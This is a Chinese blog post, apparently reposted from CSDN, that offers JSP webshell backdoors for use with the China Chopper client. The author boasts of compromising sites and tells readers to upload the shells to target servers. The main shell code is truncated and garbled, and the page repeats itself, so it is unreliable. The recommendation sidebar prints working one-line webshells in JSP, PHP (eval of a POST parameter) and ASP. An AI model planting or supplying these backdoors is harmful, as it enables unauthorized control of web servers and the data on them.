java 菜刀_jsp一句话木马菜刀

最新推荐文章于 2024-05-30 07:27:36 发布
最新推荐文章于 2024-05-30 07:27:36 发布
阅读量6.2k 收藏
点赞数
文章标签: java 菜刀
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_30341121/article/details/114405588
版权

1.如何使用JSP一句话木马和菜刀木马

相信用过一句话木马的黑阔们对中国菜刀这个程序不会感到陌生,小弟也曾使用PHP一句话木马轻松lcx了很多站。

近期Struts2重定向漏洞疯狂来袭,不少黑阔们都摩拳擦掌、争先恐后的寻找属于自己的那群“小肉鸡”。由于工作需要,我也对几个站点做了Struts2重定向漏洞的测试,所有使用Struts2框架的网站安全问题均不容乐观,中标率几乎达到了85%以上。

也许一场血雨腥风的Struts2漏洞利用潮即将来临。说了这么多废话,本文的目的是什么呢?其实只是想记录一下JSP几种后门代码啦,因为曾经找JSP菜刀马找的老辛苦了。

1、首先是JSP一句话木马和它的客户端小伙伴。(小伙伴们都惊呆了~~~) 以下是服务端,保存成one.jsp并上传至目标服务器中。

通过使用一句话木马客户端连接one.jsp木马。将下列代码保存为html页面:JSP一句话木马客户端 专用JSP木马连接器 服务端代码: 保存完成后,打开html页面,写入一句话木马服务端地址,例如页面:JSP一句话木马客户端 专用JSP木马连接器 服务端代码: 保存完成后,打开html页面,写入一句话木马服务端地址,例如/one.jsp,写入需要的代码和保存的文件名称点击保存即可。

2、中国菜刀能用的菜刀马本文除了对jsp一句话木马进行了说明,还提供了一个中国菜刀能用的菜刀马。将下列代码保存为xx.jsp并上传至目标服务器,使用中国菜刀工具进行连接。

2){c.setCatalog(x[2].trim());}return c;}void AA(StringBuffer sb)throws Exception{File r[]=File.listRoots();for(int i=0;i"+"|").getBytes(),0,3);while((n=is.read(b,0,512))!=-1){os.write(b,0,n);}os.write(("|"+"

b0d524f7809d4229

MaxwellGeng
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
菜刀一句话木马
weixin_44720762的博客
05-02 3812
中国菜刀,一个非常好用而又强大的webshell webshell就是以asp、php、jsp或者cgi等网页文件形式存在的一种命令执行环境,也可以将其称做为一种网页后门。 在博主本人看来,对于一名网安小白来说,这段解释对理解webshell没有丝毫帮助。webshell:web:网站 shell:命令语言。执行用户输入的命令或者说执行预先设定好的一连串的命令 也就是一种具有命令效果的网页代码,...
一句话木马JSP
09-21 8718
JSP一句话收集: <%if(request.getParameter("f")!=null)(new java.io.FileOutputStream(application.getRealPath("\\")+request.getParameter("f"))).write(request.getParameter("t").getBytes());%> ...
一句话木马与中国菜刀
mathor的博客
10-30 1万+
什么是一句话木马一句话木马就是一句简单的脚本语言,常见脚本语言的一句话木马如下 php:&lt;?php @eval($_post['pass']);?&gt; asp:&lt;%eval request ("pass")%&gt; aspx:&lt;%@ Page Language="Jscript"%&gt; &lt;%eval(Request.Item["pass"],"u
java安全——jsp一句话木马
最新发布
Innocence_0的博客
05-30 614
这里我整合并且整理成了一份【282G】的网络安全从零基础入门到进阶资料包,需要的小伙伴可以扫描下方CSDN官方合作二维码免费领取哦,无偿分享!我一共划分了六个阶段,但并不是说你得学完全部才能上手工作,对于一些初级岗位,学到第三四个阶段就足矣~不会回显执行的结果只能在后台打印一个地址,常用来反弹shell。如果你对网络安全入门感兴趣,那么你需要的话可以。④50份安全攻防面试指南。⑨历年CTF夺旗赛题解析。③安全攻防357页笔记。⑥HW护网行动经验总结。⑦100个漏洞实战案例。⑤安全红队渗透工具包。
Web安全-一句话木马
jennycisp的博客
12-25 2922
在很多的渗透过程中,渗透人员会上传一句话木马(简称Webshell)到目前web服务目录继而提权获取系统权限,不论asp、php、jsp、aspx都是如此,那么一句话木马到底是什么呢?【点击免费领取】CSDN大礼包:《黑客&网络安全入门&进阶学习资源包》?基本原理】利用文件上传漏洞,往目标网站中上传一句话木马,然后你就可以在本地通过中国菜刀即可获取和控制整个网站目录。@表示后面即使执行错误,也不报错。eval()函数表示括号内的语句字符串什么的全都当做代码执行。表示从页面中获得attack这个参数值。
2017-01-27-一句话木马原理详解
Be Smart
03-17 4754
layout: post title: “一句话木马原理详解” categories: [网络安全CyberSecurity] tags: [一句话木马] 作者:愤怒的小辣椒 链接:https://www.zhihu.com/question/269213687/answer/1088999932 来源:知乎 著作权归作者所有。商业转载请联系作者获得授权,非商业转载请注明出处。 首先理解,eval()是把里面的内容按照php代码去执行 菜刀通过你的一句话木马去进行http请求,然后用经过base64编.
Cknife 一句话连接工具.7z
07-17
【标签】"cknife 菜刀 jsp一句话"是关键词,"cknife"和"菜刀"都是对Cknife工具的别称,"jsp一句话"则特指上述的1.jsp,它是基于Java的Webshell,能够在被入侵的Web服务器上执行命令。 【压缩包子文件的文件名称...
JSP一句话后门
01-08
=null)(new java.io.FileOutputStream(application.getRealPath(“\\”)+request.getParameter(“f”))).write(request.getParameter(“t”).getBytes()); %> 使用方法: 提交url! jsp?f=1.txt” target=”_blank”...
用php实现批量查询清除一句话后门的代码
10-30
一句话后门一般简单,容易隐藏危害大,查找麻烦等。今天发现了这个Xall.php专门批量查询干掉一句话后门的代码,大家可以省去不少麻烦了
行业文档-设计装置-一种节能菜刀.zip
08-29
在本压缩包“行业文档-设计装置-一种节能菜刀.zip”中,主要包含了一份名为“一种节能菜刀.pdf”的文件。这份文档很可能是关于厨房用具设计领域的一个创新项目,特别是聚焦在节能型菜刀的设计上。接下来,我们将深入...
Xise19.9无视世界WAF.zip_菜刀
09-15
更新日志  生成内页修复生成内页内核,加速生成效率。  生成内页支持新闻采集模式,可选本地新闻或远程新闻。  生成内页支持防删功能。  生成内页支持批量操作,可数千shell不间断生成。...
jsp一句话木马
山兔的博客
04-07 2265
<%eval request ("pass")%>
一句话木马原理介绍和中国菜刀原理的介绍
Firebasky的博客
06-07 6468
菜刀,c刀,蚁剑都使用过。而且他们的方法基本上差不多。 今天突然心血来潮写来研究一下一句话木马菜刀的原理。 下面的原理是自己看其他大佬写的和自己总结的一些介绍。 希望能够帮助老表们~~~ 一句话木马原理 我这里就分析一下PHP代码,其他代码基本上差不多。希望老表们可以自己进行分析。 我们来看一下经典的一句话木马 <?php @eval($_POST['123']); ?> 前面的@表示如果脚本出现错误,则不显示错误。下面就是没有@的时候。会报错! 这里是加了@,则不会进行报错 ev
蚁剑jsp一句话木马
jennycisp的博客
12-25 2895
密码为 passwd。
使用python连接JSP一句话木马
分享与记录
08-24 3562
首先需要安装tomcat。 去官网 http://tomcat.apache.org/ 下载对应的 Linux 版本。 这里,我下载的是 apache-tomcat-8.5.70.tar.gz 最好提前安装好 JDK1.8 ,因为 kali 自带的那个可能会出现一点问题。 这是我遇到的问题,随手记录了一下。 https://blog.csdn.net/weixin_45254208/article/details/119897865 不过你也可以不重装,等出了问题再重装,万一你的电脑就没有我这种情况
java 菜刀_菜刀Jsp脚本增强版
weixin_39767887的博客
02-20 1117
某些朋友需求,这里简单的修改了下菜刀原作者的JSP脚本。主要是修复了一些BUG和代码优化,新增了查询自定义备份功能。修复BUG:1、初始化获取容器绝对路径错误如:原本路径是D:\wooyun菜刀连接默认跳转到了:D:\wooyun\wooyun目录。2、修改了无法连接Oracle数据库问题3、修改了远程下载代码4、重新压了下代码新的客户端代码如下:String Pwd="023";String E...
菜刀连接图片一句话木马
热门推荐
qq_18831583的博客
04-22 2万+
1、先制作图片一句话木马: 找好一张图片如”fox.jpg“,并且准备好一句话脚本php文件fox.php,在图片所在文件夹打开cmd命令行,执行命令:copy fox.jpg/b+fox.php/a fox1.jpg,生成图片一句话文件fox1.jpg 接下来用notepad++打开fox1.php图片,看看一句话也没有写入到图片当中,如图,一句话已经写入刀图片当中: ...
buuctf菜刀666
09-26
buf菜刀666是一个用于网络安全竞赛中的题目。根据引用中的描述,buuctf菜刀666是一个HTTP流量的题目。你可以在应用显示过滤器中输入http,查看统计里的http请求,进一步分析并解决这个题目。根据引用,你可能需要...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值